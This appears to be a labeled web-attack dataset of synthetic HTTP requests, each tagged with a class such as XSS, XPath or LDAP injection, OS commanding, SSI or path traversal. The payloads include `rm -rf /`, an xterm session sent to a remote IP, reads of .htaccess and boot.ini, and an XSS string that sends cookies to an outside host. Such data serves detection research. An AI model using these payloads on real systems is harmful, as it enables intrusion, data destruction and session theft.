Client-ip: 30.107.194.157
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Thu, 22 Apr 10 09:20:00 CET
ETag: W/"gQM0UjWusLn41Ge"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: *
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: "P1Lm2sc8jzbbKrH_S"
Max-Forwards: 819
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: Basic RXJHdGN0bm86ZXRsdGV0cGQ=
Range: -15,703-20624,9752-7
Referer: /knshaNsg/oae6cct/aneuff/stsBydd.swf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/6.4 (compatible; Konqueror/1.5; Linux i386; s6oceih)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 5895x804
Via: 2.0 www.nydNn.jpeg
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ios2anoa3ottn=ly3e&ye=emxl&mhT2=Gn 5~ot&itebaynasbInFuo=9753920&OeLe3voe=r9GwvOzzHaRx&tpna7rf=65822  or   1< laokis/coehL/5sew8/child::text()[position()=479]   or    36='] | /* | /foo[bar='&txislef2eJoudas=77540&tlEsS=dalautoexecp&nipchna1=859&rhcitmTue9psYa=nr1N 5&3btpeteltsaoa=60&ss=79&Meeeo=cDEFkB&9iuEmiiet=t :3oehtacces2h'&eegt=n1g0mxci

End - Id: 35549
Start - Id: 38682
class: LdapInjection
GET /iigea/eto50nu/Q_selectK4ByuOXphpXOSC/irRZNibKmM/muse7Tauer6Wrbecn/ak_1VQuUf9tuFc_f.y8/rEdsero/pcDZJWB0pX9YnSme/6346n/jyiye5Nsreeysopre/ePSX.bin?Ahsiewivx=5894&6yceei=enHniihehR&0rsipd=56%29%28%26%28objectClass%3Dsxa%29%28%7C%28sn+%3D++++hwe%29%28cn%3Dnhc++++J*%29%29&edolot=eFicL66FxMK&sea=arh HTTP/1.1
Host: www.lehdnnEduo.cz
Connection: close
Accept: image/gif;q=0.4, application/*;q=0.1, image/gif
Accept-Charset: windows-1252, iso-2022-jp;q=0.3
Accept-Encoding: 
Accept-Language: j-Fo;q=0.4, i-1;q=0.4, oan-dL;q=0.0, m-Xgtn7, rrdcsS-fkqn
Cache-Control: n3='re'
Client-ip: 227.212.84.21
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Tue, 11 Oct 05 04:19:58 CET
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: dfkm@ocxe8.ch
If-Modified-Since: Thu, 15 Dec 05 12:01:32 GMT
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "35o5wSZ8DNsm4.BVOG"
If-Range: *
Max-Forwards: 9544
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic bnJvM3Q6Um5vczU=
Range: 39622-,-9614,-81153
Referer: /aesbdn/toqe.rar
TE: trailers
Trailer: Warning
User-Agent: Rae5ssahkdcsz
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6318x7597
Via: 6.3 58.231.90.251:38, 6.1 84.0.90.187
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 154.58.221.162
X-Serial-Number: 7677444389981478018
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38682
Start - Id: 47108
class: XSS
GET /hlf@jLjkjHC6x@-1R2h/ahYIXv8FZfXCP1a_79H/5DUetoX3A_mHVYK0i../eate1ao6wosenoieoek/O1az1CrcpGJL.jpeg?Tdsn=8320595406&hntwuMopt=aMzktPrzegsydeTm&dNnosEm=8&oeyB2ply=944&saAthh8Tl4octy=oaretcwsdo%7Etoetepsnexec7&n2jyexecB6yprocessing-instructions0aL=mwdefg%3E%27s&12RCDASwindow.openQieval=093174&ysh=+%3A&_6C4=bihyztttAeteI&hteberlGg=AFyaxhAeg5jcog&vgnrAiZ=iqYiWecDeupdatesrhp&9rlsedhtntse9Ns=7&an3xytki7=tyg+iennetcatreplacet%3Dror&ev2naT5LIww=%3Cxml++++src++++%3D+%22+javascript%3A++%5Balert+%28%27Vif%27%29%3B%5D%22++++%3E HTTP/1.1
Host: www.lrsLc7inal.uk
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 7.50.56.44
Cookie: tet2SGw=t3-28-x7ToX;dhdscieeF2rt=thh
Cookie2: $Version="1"
Date: Mon, 12 Oct 09 01:15:31 CET
ETag: "vnU_@_vYPqXRe-uJcMr"
Expect: lomt0=LhioK
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: "FtwP2xjSBs@1xEjn6"
If-None-Match: *
If-Range: *
Max-Forwards: 5313
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM bXI4YTU4YmF1b3RvaW90YXlMNTNubXFlZmVsYXNQcmVtY29hdHJpdEU=
Authorization: Basic aW1ocDZoOW46aXB6NGVpZ3M=
Range: 74-7756,9-
Referer: /texpodnu/uatshe/iwaloaH.txt
TE: deflate;q=0.4
Trailer: Connection
User-Agent: Mozilla/5.6 (compatible; Konqueror/2.8; Solaris; u6tfQuvol)
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2605x6191
Via: 8.3 100.120.165.82, dadqne/5.0 251.38.166.245:29, 5.1 186.76.125.200
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 2379709487507553302
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47108
Start - Id: 49802
class: XPathInjection
GET /v5VNn1Y1rJj/openFGw/axi/aeVetzo60ne/RFkx.znulleU@c/tW.wqwa3t/yvxy6LgHX/Eg1h5iasI0ttzv/eTqzkKUCgB.nsf?1cwtatce6eOintn=yo1%2Flnhme%2Fbtegeu%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D793%5D+or++%27dgen7e%27%3D%27 HTTP/1.1
Host: 146.157.157.231
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.3, identity;q=0.5, identity;q=0.5
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 41.236.97.233
Cookie: or81nl=onictkchjaysetf2rt;dnIlrev=4686759367
Cookie2: $Version="71"
Date: Mon, 14 Dec 09 12:20:59 UTC
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: phhnt6fe@hiNse23A.fr
If-Modified-Since: Fri, 31 Aug 07 10:15:36 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:18:36 GMT
If-Match: *
If-None-Match: "pGRGra8HOg7T2Qr2"
If-Range: *
Max-Forwards: 58
MIME-Version: 1.9
Pragma: semyhzhs='smdtl'
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 1-,586-,-3399
Referer: /egoaoo1/eTi8ls8e/atmrx.css
TE: deflate,deflate,trailers
Trailer: Accept-Encoding
User-Agent: uOqtnb7l3 http://www.l9ett.cz
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 172x6984
Via: coiw/4.4 117.47.202.149, 4.4 32.48.92.239, 2.4 226.113.93.253:8
Transfer-Encoding: deflate
Upgrade: oticr3/9.7
Warning: 295 41.145.9.69 "ali9sAg6ha" 
X-Forwarded-For: 153.197.11.133
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49802
Start - Id: 35860
class: XPathInjection
GET /amc2U3yK/uPl6ZVyU@YGA_M.9Flv.jpg?krt=95097&ohmkttMsriA=csKz&3isf2eges=4re+xml&ot63olulh6itw=512&bu0ocuoideeh=rb6h%27+++++or+%28i+++++%3C+count%28dasd5e%2Fchild%3A%3Atext%28%29%29+++++and+++j+++%3C++++count%28tae%2Fchild%3A%3Acomment%28%29%29++++and+++++k++++%3C+++count%28seilnc%2Fchild%3A%3A*%29+++%29++++or+%27ttoAl%27+++%3D%27+Haegtt%27++++or&NiMDmAhCm=csosionElbatbomEmi&Q0pL4Y9-Lsam=52&nieMlr2i=ttnv&oynehz=317966952 HTTP/1.1
Host: www.laihtx8.be:89
Connection: er5jy
Accept: image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, identity, compress;q=0.9
Accept-Language: udai3w-hItrast;q=0.6, hi-Teaiji0i
Cache-Control: max-age=5
Client-ip: 245.148.145.123
Cookie: vuwindow.openf76D8=2r9dPE2TSaia;ZeKlikeChtacces=44747;oGiRyZ=4367399;hronsadwq=7;IJIDsam2=iVoeNY
Cookie2: $Version="9"
Date: Sat, 23 Apr 05 07:21:01 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: tlaf6q=aTyl7Sn
From: alcSeiee@shniectns.be
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Thu, 01 May 08 04:47:49 GMT
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "xSRlx4K0Vf@PBz_L"
Max-Forwards: 044
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: NTLM ZWlJc2Rzb2VzYWJpc2FQcmFJRXFhcGxud1RyZHNkaHJlc3hiWE1wYnZpbmNjbmw=
Range: -15
Referer: /oooep/trsc.gz
TE: trailers,gzip
Trailer: Range
User-Agent: yNtllhwtoCNs4lntt
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0823x5331
Via: 2.5 www.baI7tN.htm:96
Transfer-Encoding: compress
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35860
Start - Id: 36265
class: PathTransversal
PUT /hWxiYQs2ENrbQv/ceo3/SSbd0Sc/nddnd/nrz/7mGB-zvfm8iR6.7/uvzrllashImlew/ppOLGNNnw1eXS.jpg? HTTP/1.1
Content-Length: 116
Content-Language: eafoukta,8hsriLn9,tst
Content-Encoding: deflate
Content-Location: http://www.teoaoe.uk/pxdmtnen/habtah/qnnir.pdf
Content-MD5: cW81ZTBwMXJ1aWR0bHRpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jan 05 10:33:16 GMT
Last-Modified: Sat, 10 May 08 07:50:45 UTC
Host: 234.96.145.70
Connection: close
Accept: text/*, image/*, audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: sonoae-mejt4det
Cache-Control: only-if-cached
Client-ip: 112.174.108.236
Cookie: rNopadbwagmeo2t=eIlM;9tginmnP=qK11jFCRb;1irss0ovoik=oeweeunthunOs;KtNQwEJOMRB=6
Cookie2: $Version="294"
Date: Sun, 31 May 09 02:34:55 GMT
ETag: W/"oOCb5nZctRT5ek672"
Expect: aPdn
From: h4lVt@earfemtsac.org
If-Modified-Since: Mon, 11 Jan 10 04:45:38 GMT
If-Unmodified-Since: Mon, 28 Jan 08 19:49:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Nov 08 04:54:59 GMT
Max-Forwards: 84
MIME-Version: 7.1
Pragma: e5iYsOrs='y'
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: http://1ieyEhst.de/nTmni.cgi
TE: trailers,chunked
Trailer: Via
User-Agent: cgoae (bt0Dm5yTV; cXUUVmJeO; mfIxj8NzYM; e0liEdXuoK)
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: i2m/4.5 www.hrf6lnaE.tiff, 0.4 237.135.7.15
Transfer-Encoding: lealek
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

kx=5I9b1N&esre1ae7edhhiud=t@iG0-1dA0&Hnns=sJoOWO.0&26iwusiowZh=12&qcentsn6=ihtaccesh&wh1tctijc=e:/.htaccess~

End - Id: 36265
Start - Id: 42952
class: OsCommanding
GET /wFP/ohAENlBPZQ3/bdawtRmhcg/0t@rg8aCT2fSSCZK/bsyifo/W8rfNhtpassQ/Wi99e/sZsoWkpLOQmwI.js? HTTP/1.1
Host: www.rfursda8.net:370
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.9
Accept-Language: k6itg7mh-cmtlmwl, dhilii-mhbsamo;q=0.9
Cache-Control: min-fresh=18448
Cookie: e3sdrt23eEart=syB;bdmfg4rieI8aLEr=aAssmaEct;nm3tdi=syj8;earfI59t1ou=qrae);trut=|/usr/openwin/bin/xterm+-display+142.205.58.247:0%00;0iteysugt5=5perl
Cookie2: $Version="2"
Date: Thu, 14 Jun 07 09:58:46 GMT
Expect: 100-continue
If-Modified-Since: Mon, 28 Apr 08 04:13:12 UTC
If-Unmodified-Since: Sun, 07 Sep 08 21:57:25 CET
If-Match: *
Max-Forwards: 375
Authorization: NTLM YzVpUnR1bHB2a3N4b25zc2VJb2kwaG1zbXNkaW44ZGxlYTdoaTBmZmluc3M=
Referer: http://www.d1enseji.cz/SGct/6ebk/jkthet.gif
User-Agent: Mozilla/8.6 (X11; U; Linux i586 2.7; di-ve; rv:2.4.9) Gecko/27569114
X-Serial-Number: 61844777851149427
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42952
Start - Id: 40350
class: SSI
POST /tSJpTe9Z2FYZRx7jSZI/Nz/nBreilNOtcoln.jpg? HTTP/1.0
Content-Length: 207
Content-Language: aiQhei
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 09 Jul 04 08:05:35 GMT
Last-Modified: Fri, 09 Apr 10 23:01:10 UTC
Host: 104.173.132.174
Connection: kwach
Accept: application/rtf
Accept-Charset: *;q=0.1
Accept-Encoding: identity, identity;q=0.2, gzip;q=0.9, gzip;q=0.3
Accept-Language: uofydsn-wte4C;q=0.4, eta4l-wwse;q=0.8, leCods-7ca, aatEaeYe-nLrgNk, o-6mc2;q=0.3
Cookie: jaauweimexadEYg=<!--   #exec  cmd="c:\progra~1\mrtolL\ohEez\wmEa.exe     d:\itdelel\www.iens.org\Eeaqanht\database.mdb    /x     exporttofoxpro"-->;toe=6;nisrNI=386249;yefn=g-j;tohln6finaelRr6=7504697788;prTR5uIEb=ooecmdpmeta6lhCs
Cookie2: $Version="3"
Date: Sat, 13 Sep 08 15:41:57 UTC
If-Match: "Q37tEn29z7wrq62D"
If-None-Match: *
If-Range: "zLEbkJCOs0k4KDAoti7"
Referer: /thannn/aoshiuf/sinerA/regdeuc.php
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 8.2; s6-ic; rv:9.8.7) Gecko/76070014
Upgrade: dgvowm/8.5, 8ta8de/5.1, nyr9oa/2.2
X-Serial-Number: 2822373451

iuadh8=tdulo&osewpo75=553707&ma9la=Gii&FU4FhxE2=68238783&i5umgztinviefde=4&Jlbgsound7d-q=iohyisdn&shaeEecLoae=iYpGfTXV&0einGo6bio=0921&crpeqeei9l=8200728133&-andSIRWP7P=bgxG4x&aeTertdou=1674012568&shmCatq=91

End - Id: 40350
Start - Id: 49792
class: XPathInjection
GET /kere0gTihmcmGbij9r/8sU3QhwizOvdKQZ/Aruwthmjaoptouk/mH/oYEiEL/lLeGlt0G-/xZxdeleteMovy/1Te/tyk1ZGKdcmy1YA1/tTNHBhe8/PDJ.jpeg?B8egroup byBlUmO=e%40-nvqBDwcmo&tjebjienoh=qdboot.inicaiahlibstnunioninclude%5Dadminlem&g28o=010624&rhgunycM5wdafd=50&OFfhQA=eNpL9.RTn&orvHn=hH9a%27+++++or++++1%3C+A%2FsDi5%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D68%5D+or+%27eilaoo6o%27++%3D++%27&eahnttjA3dow=2665 HTTP/1.0
Host: www.dctxps.uk:35
Connection: nrzu3rbb
Accept: text/html;q=0.6, image/png;q=0.8, application/*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip, compress;q=0.5
Accept-Language: hsuy-dbiT, r-esSte;q=0.8, cwnrdn-oA;q=0.9, W3kohEk-r5hesie;q=0.7
Cache-Control: no-transform
Client-ip: 140.31.18.95
Cookie: Y9Atlga=ilgmethtaccesid
Cookie2: $Version="30"
Date: Sat, 12 Nov 05 15:12:14 GMT
ETag: W/"8Nw-K59c314vRFuXk"
Expect: o7eBsmo9
From: soenml@saae0wd.org
If-Modified-Since: Mon, 21 Jun 04 11:25:33 UTC
If-Unmodified-Since: Tue, 16 Jan 07 03:39:54 UTC
If-Match: "INpItTVHZ3I-SkGHxveB"
If-None-Match: "XQEPajdmxpZtqu1yBy"
If-Range: Mon, 04 Jun 07 18:06:18 GMT
Max-Forwards: 2835
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic em9mVks6c3JuaWVuZmU=
Range: 1-,586-,-3399
Referer: http://www.0ZheOsk.be/ierr3bm/arbt3iem/nthb.nsf
TE: deflate;q=0.8
Trailer: Connection
User-Agent: Mozilla/3.6 (X11; U; SunOS sun4u 1.2; oL-tw; rv:9.1.4) Gecko/02170942
UA-CPU: x86
UA-Disp: 662,518,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 742x2872
Via: blani/4.6 229.12.67.27, FTP/6.6 www.Ng5s2.shtml, 9.5 250.149.189.69
Transfer-Encoding: deflate
Upgrade: afn/1.9, wee/7.0
Warning: 559 www.lsvsyy.js "dlsdohma" "Mon, 19 May 08 07:26:31 CET"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 13614993900789849
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49792
Start - Id: 48680
class: XPathInjection
PUT /lDEXsNCW5l.mspx? HTTP/1.1
Content-Length: 91
Content-Language: cs,iqsPru
Content-Encoding: identity
Content-Location: http://rDu29oNe.org/NtittTi/arwwea.mdb
Content-MD5: OTZ3b3JXZXNyYmVzZWFybg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 Dec 09 07:54:57 UTC
Last-Modified: Sat, 02 Sep 06 13:24:33 GMT
Host: www.tsetutnt.be:80
Connection: close
Accept: audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: tSorpunz-Amc27w4;q=0.5, sognaa-etkyhr;q=0.1, 7Tiefz-k, ote3-a;q=0.8
Cache-Control: only-if-cached
Client-ip: 108.91.253.160
Cookie: oAneOtxeiNilota=sa]jtshutdownh/s2;@jbJ=objecte;eoroEsea8=location;Rauleebitihbcia=w|;9ee2wetthwje=c4lnu:E
Cookie2: $Version="20"
Date: Sun, 29 Apr 07 23:34:24 CET
ETag: "3.OeJwn1snCY3-uU"
Expect: 100-continue
From: NpAbn@exte7naon.de
If-Modified-Since: Sun, 26 Dec 04 08:16:46 GMT
If-Unmodified-Since: Tue, 18 Jan 05 20:23:34 CET
If-Match: "AljuqJHrOSpuY3uYH9j1"
If-None-Match: "c.0vDFWec0.hn2aQoR."
If-Range: Tue, 10 Jul 07 20:02:20 CET
Max-Forwards: 8
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c2VkQ2htdGI5dDJpcmVwUjBhbURzbWRnZmVEZGFxcGNkaWRubmVrb2ZkdDJzNg==
Authorization: Basic amg4c0VuczpodGgyaW5z
Range: 12-
Referer: http://Tbi4d.ch/snjrisl/tadies/e0y8lyfs/3eiWDDi4.tar
TE: gzip;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.6 (X11; U; Unix 2.6; Ro-3a; rv:3.0.3) Gecko/45944812
UA-CPU: StrongARM
UA-Disp: 9891,852,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2607x8764
Via: 8.2 www.diqaioe.jpg, HTTP/1.5 www.tm1e.shtml, FTP/4.6 104.149.98.90
Transfer-Encoding: identity
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 070 176.245.227.61 "leas51on5te3" 
X-Forwarded-For: 32.231.214.148
X-Serial-Number: 9550547356245150782
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cospdhm=t5jyl'   or 6     < count(path/child::*)   or    'd2Tsdoh' ='

End - Id: 48680
Start - Id: 43257
class: OsCommanding
GET /eAfotIeihnn/childV.shtml?TSs5lqvk=gee&idof=o9s9ooptio%5DzP2fCa&giienh=h%7En&9pbnoht=oih1rr+hee&1aee0vnrbnsLn=+e%27&4sxbM0inxrIsrn=%60rm+-rf++++%2F+%60&6eae=4195&dhurs8cewateuea=o4tscza&kOwoMxvinputZOV_=exBtjJlchq&hargoroa=t%5Dloe&rietnxm=oNo HTTP/1.1
Host: 51.74.178.243
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-932;q=0.9, cp-932
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 234.82.248.6
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="54"
Date: Thu, 08 Sep 05 13:15:00 UTC
ETag: "PEioMFbnQm-_spjg_"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Wed, 20 Jul 05 07:28:22 CET
If-Unmodified-Since: Thu, 12 Jul 07 09:52:55 GMT
If-Match: "bc-6xxCmtUBaDhR"
If-None-Match: *
If-Range: "Jp697HNy5stJm.NTpUy"
Max-Forwards: 3241
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic YWFhSW9ucDI6ZXh1dA==
Range: -640387
Referer: http://tua8hy.cz/owni/cTdpx08/Np4ra.htm
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.3 (Windows; U; WinNT 9.9; Et-ns; rv:3.3.5) Gecko/21184337
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 6.5 79.227.7.148, 7.9 www.y7ahkol.htm
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43257
Start - Id: 45851
class: PathTransversal
GET /ik.iVpsALUw/5C2u%u9ropenyqJ.jpg?tlxaingl=u%28atzvtat&T2eeiioncolm=rho&f0hIM=177&dotedea=305&EJPrqM=%40%5B&ynmd=25517&lODcopyT0E_az=v%3A%5Cwinnt%5Cboot.ini&a4rAqttcrtVee=+fiwhereax&7titOf30aopis=Oieiinteamrdelr&lTrmo=s++&itcrtio3mtelepi=ie+&elouc8EhaehH=includepositionment%2BF5u0acepanhx&HcLdpsheysabh=aamupxHHN HTTP/1.0
Host: 166.87.93.117:80
Connection: keep-alive
Accept: video/*;q=0.9, video/*;q=0.4, video/quicktime;q=0.4
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=286
Client-ip: 196.74.49.45
Cookie: sbarerthN=diEssaoip;1h4T1EfXVOdT=7;dt=6462417;0ScAthNy0duxnt=gins;eeceNheMsnisn=2334361114;caeasz5b=4906425420
Cookie2: $Version="5"
Date: Fri, 27 Nov 09 12:49:20 GMT
ETag: W/"mCszWHpD.O1AkJWfA"
Expect: 100-continue
From: nty1riog@emdl05l.uk
If-Modified-Since: Sat, 27 Mar 10 10:24:20 GMT
If-Unmodified-Since: Sat, 07 Feb 09 16:44:13 CET
If-Match: "8u-@EkTLXwTpZywnw"
If-None-Match: "dOSpM7@hAs4J7L56Pi"
If-Range: *
Max-Forwards: 39
MIME-Version: 2.1
Pragma: dlsui='gRSoe'
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic dGVyYWFkOnlSaW9z
Range: 505894-77
Referer: /iijw.fgf
TE: deflate;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/9.8 (Windows; U; WinNT 7.6; ua-Fo; rv:0.9.0) Gecko/25317383
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 7.8 www.eeia.gif
Transfer-Encoding: gzip
Upgrade: oaae/2.2
Warning: 787 245.252.99.223 "dmrosab" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45851
Start - Id: 35867
class: XPathInjection
GET /YC-.dll?G8=isOtb&iz3pjttf1iilv=76627791&9IkVQimgMmmsn=%29rnctvtsenselectoaos+&hxtYiu0iwiayper=a4aAdaomtEs30MtEx&OgMvpdocument=nevraZasEha&N8euoaeI=rOM3hrCw&pkesthamgt=8509412216&letudncaued=rRJ&AnlouSa7a7we1=3&MfArthat=ssa+%2B%3Btinhnvall7+xhp&na7gd=Tnoau%27%5D++%7C++P+%7C+++++%2F%2Fuser%5B+++name%2Ftext%28%29+%3D+%27tjest HTTP/1.0
Host: 167.200.235.229
Connection: keep-alive
Accept: application/*, video/*
Accept-Charset: euc-tw, utf-7;q=0.1, iso-8859-8-i;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: gsRhzde='dire'
Client-ip: 120.36.228.130
Cookie: @IvbscriptfmSIh=stdinib;0encoo=8i;itvlthr43anw3en=15499;ozpmBtermcqiaN=binonzy;RJfNs=p
Date: Wed, 07 Oct 09 10:25:47 UTC
If-Modified-Since: Wed, 07 Jan 04 09:32:30 CET
If-None-Match: *
Max-Forwards: 322
Proxy-Authorization: Digest nonce
Referer: /1t7y.php
Trailer: Expect
User-Agent: 0D4ustddet/9.5.0.3
Warning: 341 www.ei3igla.htm:804 "dheeeoo9Tztn" 

null

End - Id: 35867
Start - Id: 47377
class: XSS
GET /rDPTbM@QA.axsKN9F_2/Easx/tq95YmcZJLIUtx-rcYc9/HVrL1JYZl/tylRGKd/mZuNVm3y/e10I8beRU/rwts7iiihdcrurae7d/txtnetsI0N41e3y.swf?pj=ze7ldeleteI&eeyrtEbeJtu=51253213&ge=%3Cimg+++src++++%3D+%22++livescript%3A%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.ortoil.com%2Fcgi-bin%2Fornstionan.cgi%27%2Bdocument.cookie%29%3B%5D+%22%3E&4atdhsplf2t1e=nrunmt&et=3307652 HTTP/1.0
Host: www.9gxanutet.fr
Connection: close
Accept: audio/*;q=0.2, audio/x-wav, audio/basic;q=0.0
Accept-Charset: windows-1258;q=0.9, iso-2022-jp;q=0.7
Accept-Encoding: *
Accept-Language: izeai-t;q=0.0, oil-ltty, y-b, iqPo9-enTFn;q=0.9
Cache-Control: no-transform
Client-ip: 61.200.67.223
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="004"
Date: Tue, 10 Jun 08 11:18:20 CET
ETag: "ZnNm.cJpRx1VT2moZ"
Expect: oloi
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sun, 11 May 08 19:33:04 CET
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 114
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: Basic ZGFjdGV0MTplc2hlY0k=
Range: 35419-,75138-2674,165640-
Referer: /eqadsm/cspmrnm/hyl7fr/ephiisl.mspx
TE: chunked;q=0.1,trailers,gzip;q=0.3
Trailer: User-Agent
